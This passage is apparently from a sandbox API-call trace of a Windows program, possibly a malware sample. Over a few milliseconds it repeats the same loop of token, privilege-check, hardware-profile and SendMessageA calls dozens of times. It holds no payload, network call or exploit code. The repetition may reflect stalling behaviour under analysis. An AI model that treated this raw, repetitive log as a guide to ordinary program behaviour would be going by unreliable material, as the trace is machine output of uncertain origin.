pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.137] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.137] GetCurrentThread () returned 0xfffffffe [0085.137] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.137] GetLastError () returned 0x3f0 [0085.137] GetCurrentProcess () returned 0xffffffff [0085.137] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.137] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.137] SetLastError (dwErrCode=0x522) [0085.137] CloseHandle (hObject=0x114) returned 1 [0085.137] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.137] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.137] GetLastError () returned 0x578 [0085.137] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.137] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.137] GetCurrentThread () returned 0xfffffffe [0085.137] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.137] GetLastError () returned 0x3f0 [0085.137] GetCurrentProcess () returned 0xffffffff [0085.137] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.137] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.137] SetLastError (dwErrCode=0x522) [0085.137] CloseHandle (hObject=0x114) returned 1 [0085.137] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.137] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.137] GetLastError () returned 0x578 [0085.137] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.137] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.137] GetCurrentThread () returned 0xfffffffe [0085.137] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.137] GetLastError () returned 0x3f0 [0085.137] GetCurrentProcess () returned 0xffffffff [0085.137] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.137] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.137] SetLastError (dwErrCode=0x522) [0085.137] CloseHandle (hObject=0x114) returned 1 [0085.137] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.137] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.137] GetLastError () returned 0x578 [0085.137] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.137] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.137] GetCurrentThread () returned 0xfffffffe [0085.137] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.137] GetLastError () returned 0x3f0 [0085.138] GetCurrentProcess () returned 0xffffffff [0085.138] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.138] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.138] SetLastError (dwErrCode=0x522) [0085.138] CloseHandle (hObject=0x114) returned 1 [0085.138] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.138] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.138] GetLastError () returned 0x578 [0085.138] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.138] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.138] GetCurrentThread () returned 0xfffffffe [0085.138] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.138] GetLastError () returned 0x3f0 [0085.138] GetCurrentProcess () returned 0xffffffff [0085.138] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.138] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.138] SetLastError (dwErrCode=0x522) [0085.138] CloseHandle (hObject=0x114) returned 1 [0085.138] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.138] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.138] GetLastError () returned 0x578 [0085.138] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.138] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.138] GetCurrentThread () returned 0xfffffffe [0085.138] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.138] GetLastError () returned 0x3f0 [0085.138] GetCurrentProcess () returned 0xffffffff [0085.138] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.138] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.138] SetLastError (dwErrCode=0x522) [0085.138] CloseHandle (hObject=0x114) returned 1 [0085.138] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.138] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.138] GetLastError () returned 0x578 [0085.138] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.138] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.138] GetCurrentThread () returned 0xfffffffe [0085.138] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.138] GetLastError () returned 0x3f0 [0085.138] GetCurrentProcess () returned 0xffffffff [0085.138] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.138] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.138] SetLastError (dwErrCode=0x522) [0085.138] CloseHandle (hObject=0x114) returned 1 [0085.138] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.138] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.138] GetLastError () returned 0x578 [0085.138] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.139] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.139] GetCurrentThread () returned 0xfffffffe [0085.139] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.139] GetLastError () returned 0x3f0 [0085.139] GetCurrentProcess () returned 0xffffffff [0085.139] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.139] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.139] SetLastError (dwErrCode=0x522) [0085.139] CloseHandle (hObject=0x114) returned 1 [0085.139] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.139] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.139] GetLastError () returned 0x578 [0085.139] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.139] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.139] GetCurrentThread () returned 0xfffffffe [0085.139] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.139] GetLastError () returned 0x3f0 [0085.139] GetCurrentProcess () returned 0xffffffff [0085.139] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.139] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.139] SetLastError (dwErrCode=0x522) [0085.139] CloseHandle (hObject=0x114) returned 1 [0085.139] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.139] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.139] GetLastError () returned 0x578 [0085.139] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.139] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.139] GetCurrentThread () returned 0xfffffffe [0085.139] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.139] GetLastError () returned 0x3f0 [0085.139] GetCurrentProcess () returned 0xffffffff [0085.139] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.139] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.139] SetLastError (dwErrCode=0x522) [0085.139] CloseHandle (hObject=0x114) returned 1 [0085.139] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.139] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.139] GetLastError () returned 0x578 [0085.139] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.139] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.139] GetCurrentThread () returned 0xfffffffe [0085.139] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.139] GetLastError () returned 0x3f0 [0085.139] GetCurrentProcess () returned 0xffffffff [0085.139] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.139] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.139] SetLastError (dwErrCode=0x522) [0085.139] CloseHandle (hObject=0x114) returned 1 [0085.140] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.140] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.140] GetLastError () returned 0x578 [0085.140] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.140] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.140] GetCurrentThread () returned 0xfffffffe [0085.140] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.140] GetLastError () returned 0x3f0 [0085.140] GetCurrentProcess () returned 0xffffffff [0085.140] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.140] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.140] SetLastError (dwErrCode=0x522) [0085.140] CloseHandle (hObject=0x114) returned 1 [0085.140] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.140] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.140] GetLastError () returned 0x578 [0085.140] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.140] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.140] GetCurrentThread () returned 0xfffffffe [0085.140] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.140] GetLastError () returned 0x3f0 [0085.140] GetCurrentProcess () returned 0xffffffff [0085.140] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.140] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.140] SetLastError (dwErrCode=0x522) [0085.140] CloseHandle (hObject=0x114) returned 1 [0085.140] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.140] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.140] GetLastError () returned 0x578 [0085.140] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.140] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.140] GetCurrentThread () returned 0xfffffffe [0085.140] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.140] GetLastError () returned 0x3f0 [0085.140] GetCurrentProcess () returned 0xffffffff [0085.140] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.140] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.140] SetLastError (dwErrCode=0x522) [0085.140] CloseHandle (hObject=0x114) returned 1 [0085.140] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.140] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.140] GetLastError () returned 0x578 [0085.140] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.140] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.140] GetCurrentThread () returned 0xfffffffe [0085.140] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.140] GetLastError () returned 0x3f0 [0085.140] GetCurrentProcess () returned 0xffffffff [0085.141] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.141] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.141] SetLastError (dwErrCode=0x522) [0085.141] CloseHandle (hObject=0x114) returned 1 [0085.141] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.141] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.141] GetLastError () returned 0x578 [0085.141] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.141] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.141] GetCurrentThread () returned 0xfffffffe [0085.141] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.141] GetLastError () returned 0x3f0 [0085.141] GetCurrentProcess () returned 0xffffffff [0085.141] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.141] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.141] SetLastError (dwErrCode=0x522) [0085.141] CloseHandle (hObject=0x114) returned 1 [0085.141] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.141] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.141] GetLastError () returned 0x578 [0085.141] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.141] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.141] GetCurrentThread () returned 0xfffffffe [0085.141] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.141] GetLastError () returned 0x3f0 [0085.141] GetCurrentProcess () returned 0xffffffff [0085.141] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.141] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.141] SetLastError (dwErrCode=0x522) [0085.141] CloseHandle (hObject=0x114) returned 1 [0085.141] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.141] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.141] GetLastError () returned 0x578 [0085.141] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.141] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.141] GetCurrentThread () returned 0xfffffffe [0085.141] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.141] GetLastError () returned 0x3f0 [0085.141] GetCurrentProcess () returned 0xffffffff [0085.141] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.141] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.141] SetLastError (dwErrCode=0x522) [0085.142] CloseHandle (hObject=0x114) returned 1 [0085.142] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.142] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.142] GetLastError () returned 0x578 [0085.142] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.142] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.142] GetCurrentThread () returned 0xfffffffe [0085.142] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.142] GetLastError () returned 0x3f0 [0085.142] GetCurrentProcess () returned 0xffffffff [0085.142] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.142] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.142] SetLastError (dwErrCode=0x522) [0085.142] CloseHandle (hObject=0x114) returned 1 [0085.142] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.142] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.142] GetLastError () returned 0x578 [0085.142] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.142] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.142] GetCurrentThread () returned 0xfffffffe [0085.142] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.142] GetLastError () returned 0x3f0 [0085.142] GetCurrentProcess () returned 0xffffffff [0085.142] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.142] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.142] SetLastError (dwErrCode=0x522) [0085.142] CloseHandle (hObject=0x114) returned 1 [0085.142] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.142] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.142] GetLastError () returned 0x578 [0085.142] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.142] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.142] GetCurrentThread () returned 0xfffffffe [0085.142] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.142] GetLastError () returned 0x3f0 [0085.142] GetCurrentProcess () returned 0xffffffff [0085.142] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.142] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.142] SetLastError (dwErrCode=0x522) [0085.142] CloseHandle (hObject=0x114) returned 1 [0085.142] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.142] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.142] GetLastError () returned 0x578 [0085.142] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.142] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.142] GetCurrentThread () returned 0xfffffffe [0085.142] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.142] GetLastError () returned 0x3f0 [0085.142] GetCurrentProcess () returned 0xffffffff [0085.143] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.143] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.143] SetLastError (dwErrCode=0x522) [0085.143] CloseHandle (hObject=0x114) returned 1 [0085.143] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.143] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.143] GetLastError () returned 0x578 [0085.143] 